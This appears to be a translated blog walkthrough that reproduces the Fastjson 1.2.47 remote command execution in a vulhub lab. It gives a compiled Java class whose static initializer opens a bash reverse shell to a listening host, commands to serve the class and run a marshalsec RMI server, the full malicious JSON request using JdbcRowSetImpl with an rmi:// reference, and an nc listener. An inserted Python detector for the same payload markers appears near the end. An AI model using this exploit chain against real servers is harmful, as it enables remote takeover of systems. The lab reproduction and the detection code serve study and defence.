Fastjson Remote Command Execution
2022-10-30
migrate_
Affected versions
Fastjson 1.2.47 and earlier
Reproduction steps
Using vulhub
Open the vulnerable page
Create a TouchFile.java and compile it to a class file
javac TouchFile.java
File contents
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/cve-2017-18349"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
getshell (the exploit actually used)
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.199.51/4444 0>&1"});
            p.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
Preparing the tooling
1. Start an HTTP server
Put the generated file (TouchFile.class) in the web root (wwwroot)
so that the file is reachable, for example like this:
http://118.190.11.22/TouchFile.class
If no web server is available, Python can serve a minimal one
Start the site with Python
python -m SimpleHTTPServer 1111
http://192.168.239.139:1111/TouchFile.class
Then use the marshalsec project to start an RMI server listening on port 9999 and specify the remote class to load
marshalsec download: https://github.com/RandomRobbieBF/marshalsec-jar
Install mvn
Maven official site
https://maven.apache.org/download.cgi
Download Maven
wget https://archive.apache.org/dist/maven/maven-3/3.8.5/binaries/apache-maven-3.8.5-bin.tar.gz
Create the mvn directory
mkdir /usr/local/mvn
Extract it to the target location
tar -zxvf apache-maven-3.8.5-bin.tar.gz -C /usr/local/mvn
Change into the directory
/usr/local/mvn
Rename the extracted directory
mv apache-maven-3.8.5 maven-3.8.5
Configure environment variables
vi /etc/profile
Set the Maven environment variables
MAVEN_HOME=/usr/local/mvn/maven-3.8.5
export PATH=$PATH:$MAVEN_HOME/bin
Reload /etc/profile
source /etc/profile
Check the Maven version
mvn -version
Installation complete
Run
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.239.139:1111/#TouchFile" 9999
Modify the packet in Burp Suite and send the request
POST / HTTP/1.1
Host: 123.58.224.8:50365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 197

{"a":{ "@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://118.190.105.21:9999/TouchFile.class","autoCommit":true}}
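As an added defensive example (not part of the original post), the following Python scans a request body for the markers the request above relies on: an @type of java.lang.Class carrying a val (the 1.2.47 class-cache step), an @type of com.sun.rowset.JdbcRowSetImpl, and a JNDI rmi:// or ldap:// reference in a string field such as dataSourceName. The sample body and the host attacker.example are constructed for illustration; parsing before matching also catches escaped keys such as \u0040type.

```python
import json
import re
from typing import Any, List

# Types that appear in the request above: java.lang.Class/val caches a class,
# then JdbcRowSetImpl is instantiated with a JNDI dataSourceName.
SUSPICIOUS_TYPES = {"java.lang.Class", "com.sun.rowset.JdbcRowSetImpl"}
JNDI_URL = re.compile(r"^(rmi|ldap)://", re.IGNORECASE)
RAW_TYPE_KEY = re.compile(r"@type", re.IGNORECASE)

# Constructed sample mirroring the payload structure; host is a placeholder.
SAMPLE_BODY = (
    '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"rmi://attacker.example:9999/TouchFile","autoCommit":true}}'
)


def _walk(node: Any, path: str, findings: List[str]) -> None:
    """Recursively inspect parsed JSON, recording autoType markers and JNDI URLs."""
    if isinstance(node, dict):
        type_name = node.get("@type")
        if isinstance(type_name, str) and type_name in SUSPICIOUS_TYPES:
            findings.append(f"{path}: @type={type_name}")
            if type_name == "java.lang.Class" and isinstance(node.get("val"), str):
                findings.append(f"{path}: java.lang.Class caches {node['val']}")
        for key, child in node.items():
            if isinstance(child, str) and JNDI_URL.match(child):
                findings.append(f"{path}.{key}: JNDI reference {child}")
            _walk(child, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for i, child in enumerate(node):
            _walk(child, f"{path}[{i}]", findings)


def scan_body(body: str) -> List[str]:
    """Return findings for one request body; an empty list means nothing matched."""
    try:
        parsed = json.loads(body)
    except ValueError:
        # Python's json is stricter than Fastjson, so an unparsable body is not
        # passed through silently: fall back to a raw substring check.
        return ["raw: @type marker in unparsable body"] if RAW_TYPE_KEY.search(body) else []
    findings: List[str] = []
    _walk(parsed, "$", findings)
    return findings
```

A body that trips this check should be logged with its source so the JNDI host can be followed up, not only blocked.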
Listen on the port with nc
nc -lvvp 4444